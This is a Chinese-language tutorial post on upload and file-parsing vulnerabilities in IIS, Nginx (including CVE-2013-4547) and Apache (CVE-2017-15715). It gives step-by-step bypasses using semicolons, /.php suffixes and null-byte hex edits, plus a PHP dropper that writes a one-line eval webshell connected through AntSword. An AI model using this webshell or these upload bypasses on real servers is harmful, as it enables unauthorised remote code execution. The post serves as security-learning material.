文件解析漏洞

1.IIS解析漏洞

(1)IIS6.x目录解析:

.asp/1.txt无论什么文件都被解析为asp文件

(2)畸形文件解析

分号可以起到截断作用,也就是说 2.asp;.jpg会被服务器看成是2.asp。

2.IIS7.x

(1)利用姿势

在小p中www目录下创建1.jpg里面写phpinfo,后面加/.php可以访问到

Getshell 一句话木马

同上,蚁剑连接成功

3.Niginx解析漏洞

(1)nginx_parsing

Nginx的文件解析漏洞和IS7.0的解析漏洞同样的原理,因为 cgi.fix_pathinfo=1 造成的解析漏洞,同样使用 1.jpg/.php 方式进行绕过

上传jpg

后面加/.php

get型可以进行cmd赋值

(2)CVE-2013-4547

此漏洞为文件名逻辑漏洞,修改其16进制编码可使其绕过策略,导致解析为php。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。

1)准备phpinfo的文件

<?php fputs(fopen('zzy.php','w'),'<?php @eval($_POST["cmd"])?>');?>

2)上传并抓包
3)后面添加两个空格加.php

4)hex中将第二个空格改为00,再发送

5)访问路径/uploadfiles/2.txt加两个空格.php再进行抓包

6)将%20都改成空格,hax中第二个再改成00

7)发现可以访问

直接访问创建好的zzy.php,蚁剑连接

4.Apache解析漏洞

(1)apache_parsing

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析就再往左判断。如 1.php.xxxxX,后面是什么都解析为php

(2)CVE-2017-15715

Apache HTTPD是一款HTTP服务器,它可以通过mod php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php%OA将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

上传,并抓包在evil.php文件后面添加空格0x20在改为 0x0a 再次返送即可上传成功。

连接蚁剑

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值